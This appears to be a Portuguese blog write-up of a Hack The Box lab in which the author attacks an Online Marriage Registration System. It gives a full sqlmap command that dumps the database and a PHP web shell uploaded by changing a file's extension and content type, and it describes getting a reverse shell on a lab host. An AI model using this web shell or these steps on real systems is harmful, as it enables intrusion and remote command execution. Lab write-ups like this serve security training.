HTB - Write Up - File Upload com Shell Reversa (WS03)

SQL Injection

Durante a enumeração da rede remota 172.16.1.x, identifiquei a aplicação OMRS - Online Marriage Registration System. Ao pesquisar sobre essa aplicação encontrei o exploit 49307 para explorar a falha de SQL Injection no campo searchdata. 

Usando a ferramenta SQLMap foi possível fazer o dump da base de dados, conforme mostram as imagens abaixo: 

sqlmap -r request -dbms=mysql -D omrsdb --level 5 --risk 3 --random-agent --proxy=http://127.0.0.1:8080 --threads=10 --dump




File Upload and Directory Listing to Reverse Shell 

Na enumeração da aplicação OMRS, identifiquei a listagem de diretório habilitada no path /usr/images. A aplicação é vulnerável a RCE - Remote Code Execution conforme o exploit 49557 publicado no Exploit DB. 

A execução do script do exploit não funcionou e a exploração foi realizada manualmente através da requisição interceptada pelo Burp Suite. 

Web Shell 

Ao interceptar a requisição para o cadastro no recurso marriage-reg-form.php, o código da Web Shell foi inserido como o conteúdo do arquivo, o nome do arquivo alterado para a extensão .php e o content-type modificado para application/x-php.

Código da Web Shell

<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>


O arquivo é salvo no diretório /user/images e a execução da Web Shell ocorre ao acessar o arquivo com o parâmetro ?cmd= para execução de comandos. 


Reverse Shell

No caso da conexão reversa, encontrei um código específico para shell reversa em servidores Windows. O github do código pode ser acessado AQUI Foi necessário alterar o local para acesso do arquivo da shell reversa, que no caso deste laboratório é C:\\Apache24\\htdocs\\user\\images


Depois que a requisição é enviada, o acesso ao arquivo da shell é feito e a conexão estabelecida com a máquina DANTE-WS03



O próximo passo é iniciar a enumeração interna deste servidor e realizar a escalação de privilégio. 

Continua...

Referências: 

[+] https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/windows
[+] https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Comentários

Postagens mais visitadas